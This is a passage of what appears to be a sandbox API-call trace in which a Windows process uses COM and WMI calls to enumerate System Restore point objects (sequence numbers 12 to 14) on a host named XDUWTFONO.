ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.645] WbemDefPath:IUnknown:Release (This=0x6737f90) returned 0x2 [0116.645] WbemDefPath:IUnknown:Release (This=0x6737f90) returned 0x1 [0116.645] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.645] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6737f90) returned 0x0 [0116.645] WbemDefPath:IUnknown:AddRef (This=0x6737f90) returned 0x3 [0116.645] WbemDefPath:IUnknown:Release (This=0x6737f90) returned 0x2 [0116.645] WbemDefPath:IWbemPath:SetText (This=0x6737f90, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=12") returned 0x0 [0116.646] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.646] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.646] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.646] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.646] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.646] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.647] IWbemClassObject:Get (in: This=0x6739110, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352be10*=0, plFlavor=0x352be14*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), pType=0x352be10*=19, plFlavor=0x352be14*=0) returned 0x0 [0116.647] IWbemClassObject:Get (in: This=0x6739110, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352be10*=19, plFlavor=0x352be14*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), pType=0x352be10*=19, plFlavor=0x352be14*=0) returned 0x0 [0116.647] CoTaskMemAlloc (cb=0x4) returned 0x77c298 [0116.647] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c298, puReturned=0x3526b58 | out: apObjects=0x77c298*=0x6739328, puReturned=0x3526b58*=0x1) returned 0x0 [0116.648] IUnknown:QueryInterface (in: This=0x6739328, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x6739328) returned 0x0 [0116.648] IUnknown:QueryInterface (in: This=0x6739328, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.648] IUnknown:QueryInterface (in: This=0x6739328, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.648] IUnknown:AddRef (This=0x6739328) returned 0x3 [0116.648] IUnknown:QueryInterface (in: This=0x6739328, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.648] IUnknown:QueryInterface (in: This=0x6739328, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.648] IUnknown:QueryInterface (in: This=0x6739328, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673932c) returned 0x0 [0116.648] IMarshal:GetUnmarshalClass (in: This=0x673932c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.648] IUnknown:Release (This=0x673932c) returned 0x3 [0116.648] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.649] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.649] IUnknown:QueryInterface (in: This=0x6739328, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.649] IUnknown:Release (This=0x6739328) returned 0x2 [0116.649] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.649] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.649] IUnknown:QueryInterface (in: This=0x6739328, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x6739328) returned 0x0 [0116.649] IUnknown:AddRef (This=0x6739328) returned 0x4 [0116.649] IUnknown:Release (This=0x6739328) returned 0x3 [0116.649] IUnknown:Release (This=0x6739328) returned 0x2 [0116.649] CoTaskMemFree (pv=0x77c298) [0116.649] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.649] IUnknown:AddRef (This=0x6739328) returned 0x3 [0116.649] IWbemClassObject:Get (in: This=0x6739328, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.650] IWbemClassObject:Get (in: This=0x6739328, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=13", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.650] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=13") returned 0x70 [0116.650] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=13") returned 0x70 [0116.650] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.650] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.650] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.650] IUnknown:Release (This=0x72015c) returned 0x1 [0116.651] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736e18) returned 0x0 [0116.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.651] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e18, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6738000) returned 0x0 [0116.651] WbemDefPath:IUnknown:Release (This=0x6736e18) returned 0x0 [0116.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6738000) returned 0x0 [0116.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.652] WbemDefPath:IUnknown:AddRef (This=0x6738000) returned 0x3 [0116.652] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.652] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.652] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c298) returned 0x0 [0116.652] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c298, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.652] WbemDefPath:IUnknown:Release (This=0x77c298) returned 0x3 [0116.652] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.652] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.652] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.652] WbemDefPath:IUnknown:Release (This=0x6738000) returned 0x2 [0116.652] WbemDefPath:IUnknown:Release (This=0x6738000) returned 0x1 [0116.652] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.652] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.652] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6738000) returned 0x0 [0116.652] WbemDefPath:IUnknown:AddRef (This=0x6738000) returned 0x3 [0116.652] WbemDefPath:IUnknown:Release (This=0x6738000) returned 0x2 [0116.653] WbemDefPath:IWbemPath:SetText (This=0x6738000, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=13") returned 0x0 [0116.653] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.653] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.653] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.653] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.653] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.653] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.653] IWbemClassObject:Get (in: This=0x6739328, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352c660*=0, plFlavor=0x352c664*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), pType=0x352c660*=19, plFlavor=0x352c664*=0) returned 0x0 [0116.653] IWbemClassObject:Get (in: This=0x6739328, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352c660*=19, plFlavor=0x352c664*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), pType=0x352c660*=19, plFlavor=0x352c664*=0) returned 0x0 [0116.653] CoTaskMemAlloc (cb=0x4) returned 0x77c2d8 [0116.653] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c2d8, puReturned=0x3526b58 | out: apObjects=0x77c2d8*=0x673afa0, puReturned=0x3526b58*=0x1) returned 0x0 [0116.655] IUnknown:QueryInterface (in: This=0x673afa0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673afa0) returned 0x0 [0116.655] IUnknown:QueryInterface (in: This=0x673afa0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.655] IUnknown:QueryInterface (in: This=0x673afa0, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.655] IUnknown:AddRef (This=0x673afa0) returned 0x3 [0116.655] IUnknown:QueryInterface (in: This=0x673afa0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.655] IUnknown:QueryInterface (in: This=0x673afa0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.655] IUnknown:QueryInterface (in: This=0x673afa0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673afa4) returned 0x0 [0116.655] IMarshal:GetUnmarshalClass (in: This=0x673afa4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.655] IUnknown:Release (This=0x673afa4) returned 0x3 [0116.655] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.655] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.655] IUnknown:QueryInterface (in: This=0x673afa0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.656] IUnknown:Release (This=0x673afa0) returned 0x2 [0116.656] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.656] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.656] IUnknown:QueryInterface (in: This=0x673afa0, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673afa0) returned 0x0 [0116.656] IUnknown:AddRef (This=0x673afa0) returned 0x4 [0116.656] IUnknown:Release (This=0x673afa0) returned 0x3 [0116.656] IUnknown:Release (This=0x673afa0) returned 0x2 [0116.656] CoTaskMemFree (pv=0x77c2d8) [0116.656] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.656] IUnknown:AddRef (This=0x673afa0) returned 0x3 [0116.656] IWbemClassObject:Get (in: This=0x673afa0, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.656] IWbemClassObject:Get (in: This=0x673afa0, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=14", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.656] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=14") returned 0x70 [0116.656] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=14") returned 0x70 [0116.656] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.657] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.657] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.657] IUnknown:Release (This=0x72015c) returned 0x1 [0116.658] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736e28) returned 0x0 [0116.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.658] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6738070) returned 0x0 [0116.658] WbemDefPath:IUnknown:Release (This=0x6736e28) returned 0x0 [0116.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6738070) returned 0x0 [0116.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.658] WbemDefPath:IUnknown:AddRef (This=0x6738070) returned 0x3 [0116.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c2d8) returned 0x0 [0116.659] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c2d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.659] WbemDefPath:IUnknown:Release (This=0x77c2d8) returned 0x3 [0116.659] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.659] 